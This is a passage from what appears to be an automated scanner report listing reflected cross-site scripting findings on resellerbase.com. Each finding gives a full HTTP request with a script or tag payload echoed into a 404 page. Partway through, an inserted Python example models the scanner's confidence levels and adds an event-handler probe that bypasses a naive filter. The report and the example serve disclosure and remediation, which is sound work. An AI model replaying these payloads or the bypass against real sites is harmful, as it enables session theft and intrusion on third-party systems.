X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26f8e87<script>alert(1)</script>76c1e19045b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1944. http://www.resellerbase.com/detail/26/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f113d<script>alert(1)</script>4e496116c1d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/search.phpf113d<script>alert(1)</script>4e496116c1d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/search.phpf113d<script>alert(1)</script>4e496116c1d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1945. http://www.resellerbase.com/detail/26/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/26/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 39948<a>35d5c66b799 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/26/search.php?keyword=search...&Submit3=Search39948<a>35d5c66b799&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/search.php?keyword=search...&Submit3=Search39948<a>35d5c66b799&opt=2 was not found on this server.</p>
...[SNIP]...

2.1946. http://www.resellerbase.com/detail/26/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/26/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 46348<a>4a085a2a19c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/26/search.php?keyword=search...46348<a>4a085a2a19c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/search.php?keyword=search...46348<a>4a085a2a19c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1947. http://www.resellerbase.com/detail/26/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5fa46<script>alert(1)</script>f5391158f69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
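Added example (not part of the report, and not the scanner's own code): a Python model of what separates the "Firm" findings on this page, where only a harmless <a> probe came back unmodified, from the "Certain" ones, where the full <script>alert(1)</script> proof of concept did. It reproduces the 404 page's reflection context (the request URI printed as plain text between <p> tags), locates the probe by the random markers the report wraps around it, and steps up from the tag probe to the script proof of concept. The markers and the Submit3 search URL are taken from finding 2.1945; the three filtering variants, the hardened variant and the extra event-handler probe are constructed for illustration.

```python
import html
import re
from typing import Callable, Optional

# The report brackets every probe with random alphanumeric markers (for example
# 39948<a>35d5c66b799) so the reflection can be located in the response body.
PREFIX = "39948"
SUFFIX = "35d5c66b799"

TAG_PROBE = "<a>"                             # the harmless probe behind a "Firm" finding
SCRIPT_PROBE = "<script>alert(1)</script>"    # the proof of concept behind a "Certain" finding
EVENT_PROBE = "<img src=x onerror=alert(1)>"  # extra probe assumed by this example only

# Constructed 404 page modelled on the one in the report: the request URI is printed
# between <p> tags, which is the "plain text between tags" context the findings name.
PAGE = ('<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Error 404 - Page Not Found'
        '</title></head><body><p>The requested URL {uri} was not found on this server.</p>'
        '</body></html>')


def handler_unescaped(uri: str) -> str:
    """Model of the defect in the report: the URI is copied into the page as-is."""
    return PAGE.format(uri=uri)


def handler_naive_filter(uri: str) -> str:
    """Constructed variant: deletes the word 'script' and nothing else, so tag probes
    survive but the <script> proof of concept does not (the 'Firm' pattern)."""
    return PAGE.format(uri=re.sub(r"script", "", uri, flags=re.IGNORECASE))


def handler_strict_filter(uri: str) -> str:
    """Constructed variant that also deletes on...= event-handler attributes."""
    return PAGE.format(uri=re.sub(r"script|on[a-z]+=", "", uri, flags=re.IGNORECASE))


def handler_escaped(uri: str) -> str:
    """Hardened handler: entity-encode the URI before it lands between tags."""
    return PAGE.format(uri=html.escape(uri, quote=True))


def locate(body: str, prefix: str, suffix: str) -> Optional[str]:
    """Return whatever sits between the two markers in the body, or None if absent."""
    start = body.find(prefix)
    if start < 0:
        return None
    start += len(prefix)
    end = body.find(suffix, start)
    return None if end < 0 else body[start:end]


def reflected_unmodified(handler: Callable[[str], str], probe: str) -> bool:
    """Send the marked probe in the Submit3 parameter of the report's search URL and
    check that it comes back byte-for-byte unchanged."""
    uri = f"/detail/26/search.php?keyword=search...&Submit3=Search{PREFIX}{probe}{SUFFIX}&opt=2"
    return locate(handler(uri), PREFIX, SUFFIX) == probe


def assess(handler: Callable[[str], str]) -> str:
    """Step up from the tag probe to the script proof of concept and report confidence
    in the report's own terms. A 'Firm' result additionally gets one event-handler
    probe, which is this example's addition, not a step the report describes."""
    if not reflected_unmodified(handler, TAG_PROBE):
        return "not reflected unmodified"
    if reflected_unmodified(handler, SCRIPT_PROBE):
        return "Certain"
    if reflected_unmodified(handler, EVENT_PROBE):
        return "Certain (event handler bypassed the filter)"
    return "Firm"


if __name__ == "__main__":
    for h in (handler_unescaped, handler_naive_filter, handler_strict_filter, handler_escaped):
        print(f"{h.__name__:22s} -> {assess(h)}")
```

Two practical points follow from the model. A 404 status does not reduce exploitability: the body is served as text/html and the browser renders it like any other page, so the script in the "Certain" findings runs. And a word blacklist such as the naive filter here is not a fix, because the event-handler probe walks straight past it, which is why a "Firm" result deserves the manual follow-up the report asks for. The fix for this context is the hardened variant: entity-encode the echoed URI (htmlspecialchars in the PHP 5.2 application behind these findings) before it is written between tags.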

Request

GET /detail/26/search.php?keyword=search...&Submit3=Search&opt=2&5fa46<script>alert(1)</script>f5391158f69=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/search.php?keyword=search...&Submit3=Search&opt=2&5fa46<script>alert(1)</script>f5391158f69=1 was not found on this server.</p>
...[SNIP]...

2.1948. http://www.resellerbase.com/detail/26/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/26/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ab1ad<a>756d7243e49 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/26/search.php?keyword=search...&Submit3=Search&opt=2ab1ad<a>756d7243e49 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/search.php?keyword=search...&Submit3=Search&opt=2ab1ad<a>756d7243e49 was not found on this server.</p>
...[SNIP]...

2.1949. http://www.resellerbase.com/detail/26/sitesinstantly-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/sitesinstantly-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e52e1<script>alert(1)</script>0af6778c7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile52e1<script>alert(1)</script>0af6778c7b/26/sitesinstantly-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile52e1<script>alert(1)</script>0af6778c7b/26/sitesinstantly-com.html was not found on this server.</p>
...[SNIP]...

2.1950. http://www.resellerbase.com/detail/26/sitesinstantly-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/26/sitesinstantly-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5861b<a>2ba66e5d214 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/265861b<a>2ba66e5d214/sitesinstantly-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/265861b<a>2ba66e5d214/sitesinstantly-com.html was not found on this server.</p>
...[SNIP]...

2.1951. http://www.resellerbase.com/detail/26/sitesinstantly-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/sitesinstantly-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1fbf<script>alert(1)</script>0fec5c636ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/a1fbf<script>alert(1)</script>0fec5c636ce HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/a1fbf<script>alert(1)</script>0fec5c636ce was not found on this server.</p>
...[SNIP]...

2.1952. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9719e<script>alert(1)</script>47e64864df1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9719e<script>alert(1)</script>47e64864df1/26/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9719e<script>alert(1)</script>47e64864df1/26/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1953. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9bace<script>alert(1)</script>68b6e766ad0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/269bace<script>alert(1)</script>68b6e766ad0/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/269bace<script>alert(1)</script>68b6e766ad0/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1954. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 69d1c<script>alert(1)</script>303ee9f0e77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/themes69d1c<script>alert(1)</script>303ee9f0e77/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/themes69d1c<script>alert(1)</script>303ee9f0e77/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1955. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 14390<script>alert(1)</script>35cadb236d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/themes/kosmos14390<script>alert(1)</script>35cadb236d/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/themes/kosmos14390<script>alert(1)</script>35cadb236d/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1956. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a80b5<script>alert(1)</script>a3d9076dbc1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/themes/kosmos/imagesa80b5<script>alert(1)</script>a3d9076dbc1/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/themes/kosmos/imagesa80b5<script>alert(1)</script>a3d9076dbc1/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1957. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4efdf<script>alert(1)</script>8be84185e6c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/themes/kosmos/images/rating4efdf<script>alert(1)</script>8be84185e6c/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/themes/kosmos/images/rating4efdf<script>alert(1)</script>8be84185e6c/0.gif was not found on this server.</p>
...[SNIP]...

2.1958. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d9060<script>alert(1)</script>02c5a0c9c4c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/themes/kosmos/images/rating/0.gifd9060<script>alert(1)</script>02c5a0c9c4c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/themes/kosmos/images/rating/0.gifd9060<script>alert(1)</script>02c5a0c9c4c was not found on this server.</p>
...[SNIP]...

2.1959. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d7368<script>alert(1)</script>5c21dbcceae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/themes/kosmos/images/rating/0.gif?d7368<script>alert(1)</script>5c21dbcceae=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/themes/kosmos/images/rating/0.gif?d7368<script>alert(1)</script>5c21dbcceae=1 was not found on this server.</p>
...[SNIP]...

2.1960. http://www.resellerbase.com/detail/28/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54a3b<script>alert(1)</script>8d1b654accb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail54a3b<script>alert(1)</script>8d1b654accb/28/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:16 GMT
